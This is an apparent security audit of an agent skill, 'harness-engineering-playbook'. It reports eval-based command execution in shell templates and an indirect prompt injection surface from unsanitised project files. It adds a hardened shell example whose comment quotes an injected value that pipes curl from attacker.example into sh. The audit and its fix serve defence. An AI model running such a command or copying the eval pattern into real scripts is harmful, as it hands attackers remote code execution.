harness-engineering-playbook

Pass

Audited by Gen Agent Trust Hub on Jun 1, 2026

Risk Level: SAFE
Findings: COMMAND_EXECUTION, REMOTE_CODE_EXECUTION, PROMPT_INJECTION
Full Analysis
  • [COMMAND_EXECUTION]: The Python management script scripts/harness_wizard.py invokes the external shell scripts bootstrap_harness.sh and audit_harness.sh via subprocess.run() to initialize a repository and to audit it for compliance.
  • [REMOTE_CODE_EXECUTION]: Several shell templates under assets/templates/scripts/harness/ (including lint.sh, smoke.sh, test.sh and typecheck.sh) pass commands supplied through environment variables such as HARNESS_LINT_CMD to eval. The variable is therefore parsed as shell, not treated as a single command: whoever can set it before the template runs (for example through CI job configuration or a wrapper script) can execute arbitrary shell commands with the template's privileges.
  • [PROMPT_INJECTION]: The skill exposes an indirect prompt injection surface: it ingests content from the repository it audits or bootstraps and acts on that content without treating it as untrusted.
    • Ingestion points: the harness scripts read and parse project files such as package.json, pyproject.toml and Cargo.toml to detect language toolchains and existing scripts.
    • Boundary markers: none. File contents are processed without delimiters or an "ignore embedded instructions" warning.
    • Capability inventory: the skill can execute shell commands (via eval and subprocess.run) and write to the filesystem.
    • Sanitization: the content of the project metadata files is neither sanitized nor validated before it influences which commands run.
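As an added example (not part of the audit and not the playbook's own templates), the eval pattern behind the REMOTE_CODE_EXECUTION finding, beside a hardened replacement in POSIX sh. Only the variable name HARNESS_LINT_CMD comes from the audit; lint_unsafe, lint_safe, HARNESS_ALLOWED_LINTERS and the character allowlist are assumptions made here for illustration. The same wrapper covers the smoke, test and typecheck templates by swapping the variable name.

```shell
#!/bin/sh
# Added example for this audit; not code from harness-engineering-playbook.
# Only the variable name HARNESS_LINT_CMD comes from the audit. The function
# names, the HARNESS_ALLOWED_LINTERS list and the character allowlist are
# assumptions made for illustration.

# Vulnerable pattern the audit describes: the variable is handed to eval, so
# the shell parses it as a script. A value such as
#   'ruff check .; curl http://attacker.example/x | sh'
# runs the second pipeline as well as the linter.
lint_unsafe() {
    eval "$HARNESS_LINT_CMD"
}

# Hardened replacement: treat the variable as an argument vector, not a script.
#   1. refuse anything outside a conservative character set, so the value
#      cannot chain (; & |), substitute ($ `), redirect (< >) or glob (* ? [)
#   2. require the first word to be an allow-listed linter binary
#   3. run it directly as "$@"; no eval, no sh -c, so nothing is re-parsed
# Return codes: the linter's own status on success, 2 unset, 3 bad characters,
# 4 tool not allow-listed.
lint_safe() {
    cmd="${HARNESS_LINT_CMD:-}"
    allowed="${HARNESS_ALLOWED_LINTERS:-ruff eslint cargo golangci-lint shellcheck}"

    if [ -z "$cmd" ]; then
        echo "lint: HARNESS_LINT_CMD is unset" >&2
        return 2
    fi

    case "$cmd" in
        *[!A-Za-z0-9\ ./_=:-]*)
            echo "lint: refusing HARNESS_LINT_CMD: characters outside [A-Za-z0-9 ./_=:-]" >&2
            return 3 ;;
    esac

    set -f          # disable pathname expansion while the value is split
    set -- $cmd     # field-split on whitespace into $1..$n, nothing else
    set +f

    for tool in $allowed; do
        if [ "$1" = "$tool" ]; then
            "$@"    # argv executed as-is; the linter sees its arguments verbatim
            return $?
        fi
    done

    echo "lint: '$1' is not an allow-listed linter" >&2
    return 4
}
```

The point of lint_safe is that the value never reaches a shell parser: the character and allowlist checks happen before anything executes, and "$@" starts the linter binary with its arguments passed verbatim, so `ruff check .` still works while `ruff check .; curl http://attacker.example/x | sh` is refused with exit code 3. This also changes the contract on purpose: values that relied on pipes, `&&` or variable expansion are now rejected rather than silently honoured.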
Audit Metadata
Risk Level: SAFE
Analyzed: Jun 1, 2026, 01:55 PM